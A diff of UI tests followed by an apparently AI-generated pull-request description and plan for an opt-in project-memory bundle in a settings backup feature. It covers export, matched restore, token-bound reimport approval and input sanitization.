+        unapprovedProjectImports: [candidate],
+      },
+    });
+    const canvas = within(view.container);
+    await canvas.findByText("Settings backup");
+
+    fireEvent.click(canvas.getByRole("button", { name: "Preview changes" }));
+    await canvas.findByText("Projects to reimport");
+    fireEvent.click(canvas.getByRole("checkbox", { name: "Import project rocket" }));
+    fireEvent.change(canvas.getAllByLabelText("Local project directory")[0]!, {
+      target: { value: "/home/other/rocket" },
+    });
+    await confirmRestore(canvas);
+
+    await canvas.findByText("Project import results");
+    expect(canvas.getByText(/Partially imported: rocket/)).toBeTruthy();
+    expect(canvas.queryByText(/^Imported: rocket/)).toBeNull();
+    // The undo guidance names only what this run created: files, not a registration.
+    expect(canvas.queryByText(/Newly registered project/)).toBeNull();
+    expect(canvas.queryByText(/remove the projects marked as newly registered/)).toBeNull();
+    // Still offered for a retry after the conflicts are resolved.
+    expect(canvas.getByRole("checkbox", { name: "Import project rocket" })).toBeTruthy();
   });
 
   test("re-presents fresh candidates when import approval goes stale", async () => {

--- a/tests/ui/BackupSection.test.ts
+++ b/tests/ui/BackupSection.test.ts
@@ -57,6 +57,7 @@ function renderBackupSection(
       localOnlyFiles: ["agents/local.md"],
       projectImportResults: [],
       projectBundleSkipped: false,
+      unapprovedProjectImports: [],
     },
     ...overrides,
   });
@@ -598,6 +599,7 @@ describe("BackupSection", () => {
         localOnlyFiles: [],
         projectImportResults: [],
         projectBundleSkipped: false,
+        unapprovedProjectImports: [],
       },
     });
 
@@ -668,6 +670,7 @@ describe("BackupSection", () => {
           },
         ],
         projectBundleSkipped: false,
+        unapprovedProjectImports: [],
       },
     });
     const canvas = within(view.container);

--- a/tests/ui/BackupSection.test.ts
+++ b/tests/ui/BackupSection.test.ts
@@ -48,6 +48,7 @@ function renderBackupSection(
       commandApprovals: [],
       projectImports: [],
       projectBundleSkipped: false,
+      pushError: null,
     },
     backupRestore: {
       commit: "def5678",
@@ -486,6 +487,7 @@ describe("BackupSection", () => {
         commandApprovals: [approval],
         projectImports: [],
         projectBundleSkipped: false,
+        pushError: null,
       },
     });
     const canvas = within(view.container);
@@ -549,6 +551,7 @@ describe("BackupSection", () => {
         commandApprovals: [approval],
         projectImports: [],
         projectBundleSkipped: false,
+        pushError: null,
       },
     });
     const canvas = within(view.container);
@@ -647,6 +650,7 @@ describe("BackupSection", () => {
         commandApprovals: [],
         projectImports: [candidate, unapproved],
         projectBundleSkipped: false,
+        pushError: null,
       },
       backupRestore: {
         commit: "def5678",
@@ -709,6 +713,7 @@ describe("BackupSection", () => {
         commandApprovals: [],
         projectImports: [staleCandidate],
         projectBundleSkipped: false,
+        pushError: null,
       },
     });
     const canvas = within(view.container);
@@ -750,6 +755,7 @@ describe("BackupSection", () => {
         commandApprovals: [],
         projectImports: [],
         projectBundleSkipped: true,
+        pushError: null,
       },
     });
     const canvas = within(view.container);

--- a/tests/ui/BackupSection.test.ts
+++ b/tests/ui/BackupSection.test.ts
@@ -46,12 +46,16 @@ function renderBackupSection(
       localOnlyFiles: ["agents/local-only.md"],
       redactions: ["mcp.jsonc: github.headers.Authorization"],
       commandApprovals: [],
+      projectImports: [],
+      projectBundleSkipped: false,
     },
     backupRestore: {
       commit: "def5678",
       snapshotPath: "/tmp/mux-backup-snapshot",
       changedFiles: ["preferences.json"],
       localOnlyFiles: ["agents/local.md"],
+      projectImportResults: [],
+      projectBundleSkipped: false,
     },
     ...overrides,
   });
@@ -117,6 +121,7 @@ describe("BackupSection", () => {
         repoUrl: "git@github.com:example/other.git",
         branch: "release",
         path: "shared/",
+        includeProjects: false,
       })
     );
     await canvas.findByText("Backup to repository");
@@ -344,6 +349,7 @@ describe("BackupSection", () => {
         repoUrl: "git@github.com:example/new.git",
         branch: "main",
         path: "mux/",
+        includeProjects: false,
         approvedSecretDigest: undefined,
       })
     );
@@ -478,6 +484,8 @@ describe("BackupSection", () => {
         localOnlyFiles: [],
         redactions: [],
         commandApprovals: [approval],
+        projectImports: [],
+        projectBundleSkipped: false,
       },
     });
     const canvas = within(view.container);
@@ -539,6 +547,8 @@ describe("BackupSection", () => {
         localOnlyFiles: [],
         redactions: [],
         commandApprovals: [approval],
+        projectImports: [],
+        projectBundleSkipped: false,
       },
     });
     const canvas = within(view.container);
@@ -583,6 +593,8 @@ describe("BackupSection", () => {
         snapshotPath: "/tmp/mux-backup-snapshot",
         changedFiles: [],
         localOnlyFiles: [],
+        projectImportResults: [],
+        projectBundleSkipped: false,
       },
     });
 


### PR DESCRIPTION
## Summary

Adds an **opt-in project bundle** to Settings Backup: when enabled, a backup additionally carries the project list (path, display name, sanitized git remote) and each project's memory files, and a restore can reimport them — verbatim for projects registered at the recorded path, and through an explicit, token-bound approval flow for everything else.

## Background

Settings backup previously synced only host-portable global settings; project registrations and per-project memories (`memory/project/<name>-<pathHash>/`) were always left behind, so moving to a new machine lost all project memory. Project paths are host-specific, so a naive restore would be wrong — this PR makes the cross-machine flow explicit and safe instead.

## Implementation

- **Sidecar, not core**: the bundle lives at `<managedPath>/project-bundle/` with its own manifest and byte budget. The core `manifest.json` never references it, so older builds preview/restore the same backup untouched (they simply ignore the sidecar), and a crafted core manifest still cannot smuggle `project-bundle/**` paths past the allowlist.
- **Matched restore**: a project registered at the recorded path with the locally computed memory dir restores its memory verbatim (previewed, snapshot-covered, under the memory mutation lock).
- **Unmatched → import approval**: other projects surface as candidates bound to a `sha256` token over the entry metadata + file checksums. Restore re-verifies each token against the checked-out payload; any drift fails with `PROJECT_IMPORT_APPROVAL_REQUIRED` and fresh candidates. No auto-clone, no auto-register: the user supplies an existing local directory, registration goes through `ProjectService`, and memory is written add-only (conflicts reported, never overwritten). Memory paths are re-keyed to the locally computed directory name so a foreign-OS path hash never leaks into the local store.
- **Sanitization**: recorded git remotes pass through `sanitizeBackupGitRemote` (plain `https://`/`ssh://`/scp-like only; credentials, `ext::`, `file://`, and relative paths dropped) and render as inert text. Bundle memory files run through the same secret scanner as global memory.
- Safety snapshots additionally capture registered project memory whenever a restore may write project content; project registrations themselves are documented as manual-undo.

## Validation

- 209 unit / 19 integration / 21 UI (jest) tests green; `make static-check` clean.
- Live dogfooding across two isolated dev-server sandboxes sharing one bare repo:
  - **Export**: `git ls-tree` shows `xum/project-bundle/{manifest.json,memory/...}` while core `xum/manifest.json` lists only core files; disabling the toggle removes the bundle from the next push head.
  - **Matched restore**: locally drifted memory file restored byte-identical (sha256 matches the bundle checksum); safety snapshot preserved the drifted version.
  - **Cross-instance reimport**: fresh XUM_ROOT rendered the candidate card (name, source path, inert remote), approved import registered the project in `config.json` and re-keyed memory under the locally computed dir with identical content.

## Risks

- Restore paths touch the memory store and project registration; both are gated (matched: preview + snapshot + lock; unmatched: explicit token-bound approval + add-only writes), so the residual risk is moderate and concentrated in the new bundle code paths. Core backup behavior with the toggle off is unchanged — the bundle is skipped entirely and existing manifests round-trip as before.
- Old builds pushing to a repo that contains a bundle will drop `project-bundle/` from the head (git history retains it); the settings UI warns about history retention.


---

<details>
<summary>📋 Implementation Plan</summary>

# Opt-in Project Bundle for Settings Backup (project memories + project reimport)

## Context

The settings backup (`src/node/services/backup/`) syncs a closed allowlist (`AGENTS.md`, `mcp.jsonc`, `agents/*.md`, `skills/**`, `memory/global/**`, projected `preferences.json`) to a user-chosen git repo. Project memories (`<xumRoot>/memory/project/<name>-<sha256(absPath)[:12]>/`) and project entries (`config.json` `projects` map) are excluded today.

**Goal:** an **opt-in** "project bundle" so a backup carries (a) project memories and (b) portable project entries (source path + git remote + memory dir per project, in `project-bundle/manifest.json`), and restore can **reimport** projects on another machine — registering them at a user-chosen path and re-keying their memory dir to the new path's hash.

Design stance (advisor-endorsed in prior discussion): this is an *explicit project reimport flow backed by the backup*, not raw project-config sync. Never auto-clone, never auto-register; unmatched memory is never written to live `memory/project/`.

## Scope

**In scope (v1):**
- Opt-in toggle `includeProjects` persisted in backup settings; gates export **and** restore of project content symmetrically.
- Export: a `project-bundle/` sidecar (own manifest: project entries + memory files + checksums) for config-known **user** projects only; core manifest untouched for downgrade safety.
- Restore: verbatim memory restore for projects registered at the identical path on the target; unmatched entries surfaced as per-project **import approvals** (content-bound token + user-supplied target path → register project + add-only re-keyed memory write).
- Safety snapshot covers project memory whenever a restore may write it, so memory restores stay undoable.
- UI: toggle (+ git-history privacy note), "Included" list entry, preview candidates section, per-candidate approval inputs, keybind, stories/mocks.
- Contract-language updates ("host-local, never committed" → mention opt-in backup).

**Out of scope (deferred):**
- Cloning from the recorded remote (we display it; user clones manually and points reimport at the checkout).
- Syncing project settings (color, customInstructions, trusted, runtime settings) — import hints only: `path`, `name`, `gitRemote`, `memoryDir`.
- Fuzzy matching (by remote URL/basename) of payload entries to differently-pathed registered projects — matching is exact-path or explicit user mapping.
- `memory-meta.json` (pins/stats) migration — that sidecar stays host-local (already a forbidden basename).
- Automatic rollback of project registration on failed/undone restores (results list imported projects for manual undo).

## Design

### Repo layout: sidecar bundle outside the core manifest (downgrade-safe)

**Verified code facts driving this:** `parseManifest` runs `assertAllowedPayloadPath` on every core-manifest path (payload.ts:1611–1614 → 349–356), so an old build **hard-fails preview/restore** if new paths appear in `manifest.json`. `readBackupPayloadUnchecked` reads only manifest-listed files and ignores extra files in the directory (payload.ts:1711–1724). `writeBackupPayload` wipes the destination dir on every push (payload.ts:1508).

```text
<managedPath>/manifest.json                       # core schema v1 — UNCHANGED, never lists bundle files
<managedPath>/preferences.json, AGENTS.md, ...    # existing core content
<managedPath>/project-bundle/manifest.json        # bundle manifest v1 (projects[] + files[] + checksums)
<managedPath>/project-bundle/memory/project/<dir>/**
```

- **Old build restore/preview:** reads only the core manifest → bundle silently ignored. ✔
- **Old build push:** wipes `managedPath` → bundle dropped from the latest tree (git history retains it; the next new-build push re-adds it). Documented as accepted downgrade behavior.
- **New build export:** two-step write — the existing `writeBackupPayload` (wipe + core files + core manifest) runs **unchanged**, then a new `writeProjectBundle(managedPath/project-bundle, bundle)` writes the sidecar with its **own** path validator and budget. The core allowlist (`isAllowedPayloadPath`) is **not widened**: a crafted core manifest listing `project-bundle/**` paths is still rejected by `parseManifest`, so bundle content can only enter through the bundle-validated reader.
- Since the bundle lives inside `managedPath`, gitRepo staging/sparse-checkout/commit machinery needs **zero changes**.

### Bundle manifest (single integrity root: project entries + file list)

```jsonc
{
  "schemaVersion": 1,
  "projects": [
    { "path": "/home/me/src/foo",        // absolute source path (import hint ONLY, never a write target)
      "name": "foo",                      // getProjectDisplayName(path, config)
      "gitRemote": "git@github.com:me/foo.git", // origin URL; omitted if unavailable or hasUrlCredentials()
      "memoryDir": "foo-a1b2c3d4e5f6" }   // ACTUAL source memory dir name (recorded, not recomputed)
  ],
  "files": [                              // bundle-relative paths, sha256 verified on read
    { "path": "memory/project/foo-a1b2c3d4e5f6/notes.md", "sha256": "..." }
  ]
}
```

- **`memoryDir` validation is host-portable** — `projectMemoryDirName` basename-parses the path, so recomputing it for a foreign-OS source path (Windows backup restored on POSIX) can legitimately differ. Validate instead: `memoryDir` is a safe single path segment (charset/portability rules), its hash suffix equals `sha256(entry.path).slice(0, 12)` (pure string hash, host-independent), and every bundle file of the entry lives under `memory/project/<memoryDir>/`. Restore **destinations** are always computed locally via `projectMemoryDirName(targetPath)`.

- Schema `BackupProjectBundleSchema` in `src/common/config/schemas/settingsBackup.ts`; entry cap `MAX_BACKUP_PROJECT_ENTRIES = 256` (mirrors MCP redaction caps).
- The bundle gets its **own byte/count budget instance** (same constants: 8MB/file, 64MB, 4096 files) so a large bundle can never starve core payload reads or block a core-only safety snapshot.
- **All** non-system user projects are exported as entries, including zero-memory ones (the project *list* is half the feature); only memory dirs that contain files contribute `files`. Excluded: `projectKind === "system"`, `_multi`, `_scratch` keys (`src/common/constants/{multiProject,scratch}.ts`).
- Bundle parsing/validation runs **only when `includeProjects` is on**. Toggle off ⇒ the sidecar is ignored entirely, even if malformed, so a bad bundle can never block a core-only restore. Toggle on ⇒ invalid bundle (schema, caps, checksum, memoryDir mismatch, disallowed path) is `INVALID_BACKUP`, fail closed — never silently skipped.

### Matching & reimport rules (restore)

1. New-build reader (gated on `includeProjects`): after the core payload read, read + validate `project-bundle/manifest.json` when present (own budget, bundle-scoped path validator, checksums, per-entry memoryDir validation per the portable rule above).
2. **Matched entry** — auto-restore without explicit import only when a **registered** target project exists at exactly `entry.path` **and** `projectMemoryDirName(entry.path) === entry.memoryDir` on this host → bundle memory files restore verbatim to `<muxRoot>/memory/project/<entry.memoryDir>/**` (overwrite allowed; these writes appear in restore preview `changes`; performed under the memory mutation lock). If the hash suffix matches but the full dir name differs (foreign-OS source path), the entry is a **reimport candidate** — never rejected, never silently written.
3. **Unmatched entry** — becomes `BackupProjectImport { sourcePath, name, gitRemote?, memoryFileCount, token }` where `token = sha256(canonical JSON of [schemaVersion, normalized entry {path, name, gitRemote, memoryDir}, sorted [filePath, sha256] pairs])` — the token **binds the displayed entry and its content**, so any repo change between preview and restore (files or entry metadata) invalidates it. Restore recomputes candidates from the currently checked-out payload; unknown/stale tokens ⇒ error `PROJECT_IMPORT_APPROVAL_REQUIRED` carrying fresh candidates (mirrors the `COMMAND_APPROVAL_REQUIRED` round trip).
4. **Failure semantics:** stale/unknown tokens and invalid `targetPath`s (not absolute, missing, not a directory, symlink) abort the restore **before** the safety snapshot and any mutation. After preflight passes and the snapshot exists, per-candidate *runtime* failures (dir vanished, registration race, file conflicts) are recorded in the result without aborting the restore or other candidates.
5. **Import execution** (`projectImports: [{ token, targetPath }]` on restore input), per candidate, sequenced to avoid lock nesting: re-verify the directory exists (`ProjectService.create` would otherwise mkdir) → register via `ProjectService.create(targetPath)` (tolerating "already registered at that path") → **then** acquire the memory mutation lock, re-check conflicts under the lock, and write that entry's memory files to `memory/project/<projectMemoryDirName(targetPath)>/` **add-only**: identical existing files are fine, differing existing files are skipped and reported as conflicts (no unpreviewed overwrite at a fresh target).
6. All bundle memory writes (matched verbatim + imports) run under `withTargetMutationLock(muxRoot, memoryMutationLockKey(...))` — the same lock `MemoryService` mutations take (memoryService.ts:556–566) — so backup never becomes an uncoordinated memory writer. **Never call `ProjectService.create`/`config.editConfig` while holding the memory mutation lock** (registration completes before the lock is taken).
7. **Project registration is a config mutation the safety snapshot does NOT revert.** The restore result lists `importedProjects` (+ per-file conflicts/skips) so the user can undo manually.
8. Entries the user did not approve, and bundle content when `includeProjects` is off, are skipped (never written) and reported. Toggle-off reporting is **existence-only** ("project bundle present but disabled" via a `project-bundle/manifest.json` existence check — no parsing of a possibly malformed sidecar). Re-running restore later can still import them (payload persists in the repo).

### Security checklist (enforced in code, asserted in tests)

- Validate `entry.memoryDir`: safe single segment, hash suffix `=== sha256(entry.path).slice(0,12)`, all entry files under `memory/project/<memoryDir>/`; reject bundle otherwise (`INVALID_BACKUP`). (Not full `projectMemoryDirName` equality — that recomputation is not host-portable; destinations are always locally computed.)
- Core allowlist **unchanged**: a core manifest listing `project-bundle/**` is still rejected by `parseManifest`, so bundle content cannot bypass bundle validation via the core restore path.
- `entry.path` is display/matching data only; **all** filesystem writes derive from locally computed dir names, through the existing `writeCheckedFile`/`resolveContainedPath` containment path.
- Import tokens bind the full normalized entry + content hashes, not just identity — no approve-then-swap of files or metadata.
- No auto-clone/auto-register: imports require explicit per-entry token + targetPath from the user.
- Export drops remotes that fail `hasUrlCredentials` or aren't plain `http(s)`/`ssh`/scp-like `git@host:` shapes (no `ext::`, no `file://`, no local paths); restore UI renders the remote as inert text (no link, never executed).
- `memory/project/**` marked recursively-collected for the secret scanner (`isRecursivelyCollected`, payload.ts:1326).
- Existing limits apply to the bundle via its own budget (8MB/file, 64MB, 4096 files/dirs, depth 24, hidden-name + forbidden-basename filters, hard-link tracker, Windows-portability + collision checks).

## Implementation phases

### Phase 1 — Schemas + opt-in setting + toggle UI + export sidecar

1. `src/common/config/schemas/settingsBackup.ts`
   - `SettingsBackupInputSchema` + `includeProjects: z.boolean().optional()` (lines ~205–225) — flows through all existing backup endpoints automatically and is persisted by `persistSettings`.
   - Add `BackupProjectBundleSchema` (+ entry schema, `MAX_BACKUP_PROJECT_ENTRIES = 256`), plus a remote-URL sanitizer helper (allowed shapes only; reuses `hasUrlCredentials`).
2. `src/node/services/backup/payload.ts` (or a sibling `projectBundle.ts` module reusing its internals)
   - New bundle pipeline, fully separate from the core payload: `collectProjectBundle(muxRoot, entries)` (per-entry `memory/project/<dirName>/**` collection reusing `collectDirectory` machinery — never a blind `memory/project` sweep, so orphaned dirs of deleted projects stay local), `writeProjectBundle(dir, bundle)`, bundle-scoped path validator (only `manifest.json` + `memory/project/.+`, same segment/hidden/forbidden/portability rules), own budget instance.
   - Core `createBackupPayload`/`writeBackupPayload`/`isAllowedPayloadPath` stay **unchanged**; export composes: core write, then bundle write into `<managedPath>/project-bundle`.
   - Run `scanBackupFilesForSecrets` over bundle files with recursive-collection semantics (extend `isRecursivelyCollected` handling to the bundle scan).
3. `src/node/services/backup/adapters.ts`
   - **Interface change:** `BackupPayloadStore.exportTo({ repositoryRoot, managedPath, includeProjects })`; backupService passes the persisted setting explicitly.
   - When `includeProjects`: read `config.projects`, filter system projects, compute `memoryDir` per project via `projectMemoryDirName`, fetch origin URL per project (small `execFile("git", ["-C", path, "remote", "get-url", "origin"])` helper, best-effort, sanitizer-filtered), build entries for **all** user projects.
4. `src/node/services/backup/backupService.ts`: `normalizeBackupSettings` carries `includeProjects`; `push`/`preview`/`restore` pass it to the payload store.
5. Frontend toggle (needed for Gate 1 dogfooding): `BackupSection.tsx` opt-in `<Checkbox>` in the setup form (house pattern, lines 537–587); `DEFAULT_DRAFT`/`toDraft`/`draftsEqual` (lines 53–65); conditional "Project list & project memories" row in the Included list (lines 589–609); privacy copy under the toggle: *"Previously pushed backups keep project data in the repo's git history even after disabling."* Keybind `SETTINGS_BACKUP_TOGGLE_PROJECTS` (Ctrl+Alt+P) in `keybinds.ts` + `KeybindsSection.tsx` + `actionsRef` handler (BackupSection.tsx:478–496).

**Gate 1:** unit tests (payload/adapters) green, including the compat test (bundle-bearing export's **core** manifest parses cleanly and lists no bundle paths; core reader ignores the sidecar); dogfood export (Dogfooding §A) — pushed repo tree shows `project-bundle/` content with toggle on, none with toggle off.

### Phase 2 — Bundle reader + preview candidates + matched-path restore + snapshot coverage

1. `payload.ts` / `projectBundle.ts`
   - Bundle reader beside `readBackupPayload`, invoked **only when `includeProjects`**: parse/validate `project-bundle/manifest.json` (schema, caps, checksums, memoryDir segment + hash-suffix + file-containment validation per the portable rule above, bundle path validator, own budget); toggle off ⇒ sidecar never read.
   - Restore planning: partition bundle entries into matched (write plan) / import-candidate / skipped using a caller-provided registered-project set (path → dirName); matched writes execute under the memory mutation lock; token computation for candidates.
   - Safety snapshot: **only when the incoming restore may write project content** (`includeProjects` && payload has a bundle), snapshot the local project memory of **registered** projects (bundle format, own budget). Explicit limitation: the snapshot does not cover an import target's dir if that project wasn't registered pre-restore — imports are add-only, and the restore result lists created files for manual undo.
2. `adapters.ts` — **interface changes:** `previewRestore({ ..., includeProjects })`, `validateRestore/restore({ ..., includeProjects })`; adapters supply the registered-project set from `config`.
3. `src/common/orpc/schemas/backup.ts`: `BackupProjectImportSchema`; `preview.output` + `projectImports` + skipped-project summary; `restore.output` + `skippedProjectFiles`; `BackupOperationErrorSchema.code` + `"PROJECT_IMPORT_APPROVAL_REQUIRED"` + `projectImports` field.
4. `backupService.ts` `preview`/`restore`: plumbing only; still no import execution.

**Gate 2:** unit tests green; dogfood same-path round trip (Dogfooding §B) — memory restored verbatim for a registered same-path project; unmatched entries listed in preview, nothing written for them.

### Phase 3 — Reimport execution (approval → register + re-key)

1. `src/common/orpc/schemas/backup.ts`: `restore.input` + `projectImports: z.array(z.object({ token, targetPath })).nullish()`.
2. `backupService.ts`
   - Inject `ProjectService` (via `serviceContainer.ts`).
   - `restore`: recompute candidates from the checked-out payload; unknown/stale token or invalid targetPath ⇒ abort **before** snapshot/mutation (`PROJECT_IMPORT_APPROVAL_REQUIRED` with fresh candidates / input error); after core payload restore succeeds: per candidate — re-verify dir exists, `projectService.create(targetPath)` (tolerate already-registered-at-targetPath), **then** take the memory mutation lock, re-check conflicts, add-only memory write re-keyed to `projectMemoryDirName(targetPath)`; record per-candidate results (imported / failed / conflicts); post-snapshot runtime failures never abort the restore.
3. `payload.ts`: bounded `writeImportedProjectMemory(root, entry, targetDirName, files)` using `writeCheckedFile` + add-only conflict detection, so the write path stays inside the audited module.
4. Frontend `BackupSection.tsx`
   - Preview section: "Projects to reimport" cards (name, source path, remote as inert text, memory file count).
   - Restore approvals: per-candidate checkbox + target-path text input (prefilled with source path), following the MCP command-approval block pattern (lines 766–794); tokens+paths passed in `api.backup.restore`; render per-candidate results (imported/conflict/failed) after restore.
5. `src/browser/stories/mocks/orpc.ts` + `BackupSection.stories.tsx`: extend mocks/defaults; story asserting candidates render + approval flow; keep the Phone viewport story pattern.

**Gate 3:** unit + UI tests green; dogfood cross-instance migration (Dogfooding §C) with screenshots + recording.

### Phase 4 — Contract language, docs surface, validation

1. Update "host-local, never committed" phrasing to note the opt-in backup: `src/common/utils/tools/toolDefinitions.ts:2330`, `src/common/constants/memory.ts:8–9,24–25`, `src/node/services/tools/memory.ts:34`, `src/node/services/memoryService.ts:668–670`. (`memoryMeta.ts` language stays — the sidecar genuinely never travels.)
2. Storybook test-runner pass for changed stories; `make static-check`; targeted suites: `payload.test.ts`, `backupService.test.ts`, `adapters.test.ts`, `backupService.integration.test.ts` (+ new integration case: push with bundle → fresh root → restore with import at a different path → memory present under re-keyed dir, project registered).

## Testing plan (highlights)

- **payload.test.ts:**
  - Bundle serialization; entry cap; checksum rejection; memoryDir validation (unsafe segment or wrong hash suffix ⇒ rejected; foreign-OS full-dir mismatch with correct hash suffix ⇒ reimport candidate, not rejected and not auto-restored — e.g. Windows-style source path restored on POSIX); bundle path allowlist rejects `../`, hidden names, forbidden basenames, non-`memory/project/` paths, files outside their entry's memoryDir.
  - **Compat:** bundle-bearing export's core manifest lists no bundle paths and parses under `parseManifest`; core reader ignores the sidecar (simulates old-build restore).
  - Matched/unmatched partition; unmatched + unapproved never in the write plan; toggle-off export writes no bundle (and a re-export **removes** a previously pushed bundle from the tree); toggle-off restore skips bundle content — including a **malformed** sidecar, which must not block a core-only restore.
  - Token stability + staleness: changing one memory file's content invalidates the entry token.
  - Import writes: containment, add-only conflict detection (existing differing file skipped + reported; identical file OK), zero-memory entry imports as registration-only.
  - Remote sanitizer: drops credentialed URLs, `ext::`, `file://`, local paths, unknown schemes.
  - Scanner treats bundle memory as recursively-collected (non-doc credential-ish filenames flagged).
- **backupService.test.ts:** `includeProjects` persisted + passed to the store; stale/unknown import token ⇒ `PROJECT_IMPORT_APPROVAL_REQUIRED` with fresh candidates; targetPath preflight (missing dir / non-dir / symlink) fails before snapshot creation; per-candidate failure isolation; result shapes.
- **adapters.test.ts:** system-project filtering (`_multi`, `_scratch`, `projectKind:"system"`); all user projects exported incl. zero-memory; credentialed remote dropped; registered-project set plumbed; snapshot includes project memory only when restore may write project content.
- **integration:** full round trip incl. different-path reimport (real git repos via `testHelpers.ts`): push with bundle → fresh root → restore with import at a different path → memory under re-keyed dir, project registered; plus old-reader compat round trip.
- Follow `tests` skill conventions; no tautological assertions (behavioral branches only).

## Dogfooding (evidence: screenshots + recordings + repo-tree listings at each gate)

Setup once: `dev-server-sandbox` skill → isolated `XUM_ROOT` + port; create a scratch git project; seed `memory/project/<dir>/notes.md` (via memory tool or direct file write matching `projectMemoryDirName`); create a local bare repo (`git init --bare /tmp/backup-remote.git`) as backup target (integration tests use real local repos, so file-path remotes work).

- **§A (Gate 1):** In Settings → Backup (agent-browser): enable toggle, save, "Back up now". Evidence: screenshot of toggle + Included list + privacy copy; `git -C /tmp/backup-remote.git ls-tree -r` showing `xum/project-bundle/manifest.json` + `xum/project-bundle/memory/project/<dir>/notes.md` and an unchanged core `xum/manifest.json`. Repeat with toggle off → next push's tree lacks `project-bundle/`.
- **§B (Gate 2):** Same sandbox, edit local memory file, "Preview changes" → restore changes list the memory file; "Restore" → file content reverted. Screenshot of preview grid incl. the "Projects to reimport" section for an unmatched entry.
- **§C (Gate 3):** Second sandbox (fresh `XUM_ROOT`, same backup repo, different project path e.g. `/tmp/sandbox2/proj-moved`): clone the scratch project there manually; Settings → Backup → enable toggle → Preview shows the reimport card; enter target path, approve, Restore. Evidence: screenshots of candidate card + post-restore results; shell listing of `memory/project/<newDirName>/notes.md`; project visible in sidebar.
- Record a short agent-browser video of the §C flow (screenshots remain primary evidence — `agent-browser record stop` can hang and truncate, a known gotcha); attach all evidence via `attach_file`.

## Acceptance criteria

1. Toggle off (default): export byte-identical to today; restoring a bundle-bearing payload skips project content with a visible report.
2. Toggle on: export adds `project-bundle/` (all non-system projects as entries, credential-free remotes, only their memory dirs as files) and the **core manifest is unchanged in shape** — old builds still preview/restore the core payload and ignore the bundle.
3. Disabling the toggle removes the bundle from the next pushed tree; UI states git history retains earlier pushes.
4. Same-path registered project: memory restored verbatim (previewed); config untouched.
5. Unmatched project: nothing written without explicit approval; approving with a target path registers the project and lands memory under `projectMemoryDirName(targetPath)`, add-only (conflicts reported, never silently overwritten); import token staleness forces re-approval.
6. Malicious bundle (unsafe memoryDir segment, wrong hash suffix, traversal, checksum mismatch, files outside their entry dir, oversized, >256 entries) ⇒ `INVALID_BACKUP`; no partial writes. Foreign-OS full-dir mismatch with a correct hash suffix downgrades to a reimport candidate instead of failing.
7. Safety snapshot captures the pre-restore memory files of registered projects whenever project content may be written; project *registration* and import-created files at previously unregistered targets are not auto-reverted (results list them for manual undo), and the UI says so.
8. All validation green: `make static-check`, backup unit+integration suites, Storybook stories for BackupSection.

## Net LoC estimate (product code only)

**~950–1,250 net LoC** (advisor-reviewed range): settingsBackup schemas + sanitizer ~110, payload.ts (bundle writer/reader/planner/import writes/tokens) ~420, adapters.ts ~110, backupService.ts (imports, locks, plumbing) ~140, oRPC schemas/router ~60, BackupSection.tsx (toggle, candidates, approvals, results) ~180, keybinds/serviceContainer/doc-comments ~30. (Tests/stories/mocks excluded.)

## Risks / notes

- **Old-build push drops the bundle from the latest tree** (destination wipe, payload.ts:1508); git history retains it and the next new-build push re-adds it. Accepted + documented; no data destruction.
- Bundle uses its own budget so it cannot block core-only restores/snapshots; extremely memory-heavy setups (>4096 bundle files) fail export with an explicit error — acceptable v1.
- Import ordering: registration **before** memory write, so a crash leaves a registered project without memory (benign) rather than orphaned live memory.
- Lock discipline: registration (`ProjectService.create` → `config.editConfig`) always completes **before** the memory mutation lock is taken; the memory lock wraps only file writes + under-lock conflict re-checks. No path ever holds the memory lock while entering config edits.
- Windows-unportable memory filenames fail export with a clear error (same as skills today).
- Project registration is not reverted by the safety snapshot (explicit in results/UI); full import rollback is deliberately deferred.

</details>

---

_Generated with `xum` • Model: `anthropic:claude-fable-5` • Thinking: `xhigh` • Cost: `$110.60`_

<!-- mux-attribution: model=anthropic:claude-fable-5 thinking=xhigh costs=110.60 -->
